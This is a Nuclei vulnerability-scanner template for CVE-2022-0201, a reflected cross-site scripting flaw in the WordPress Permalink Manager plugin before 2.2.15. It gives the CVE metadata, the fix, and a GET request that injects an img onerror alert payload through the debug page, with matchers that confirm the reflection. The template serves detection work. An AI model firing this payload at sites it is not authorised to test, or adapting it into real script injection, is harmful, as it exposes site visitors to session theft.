nuclei-templates/http/cves/2022/CVE-2022-0201.yaml

51 lines
2.0 KiB
YAML

id: CVE-2022-0201
info:
name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
- https://plugins.trac.wordpress.org/changeset/2656512
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0201
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.41295
cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: permalink_manager_lite_project
product: permalink_manager_lite
framework: wordpress
tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project
http:
- method: GET
path:
- '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(/XSS/)>'
- 'pm_query'
condition: and
- type: word
part: header
words:
- text/html
# digest: 4a0a004730450221008c06d6874a2519e8423b2769a4ad1c1fb83e01ecb95480d09bb27c76abde9129022018f709b1ad9c66d79205c5b66ce9aca52fe52b2fa20402b980b430ddc5e18838:922c64590222798bb761d5b6d8e72950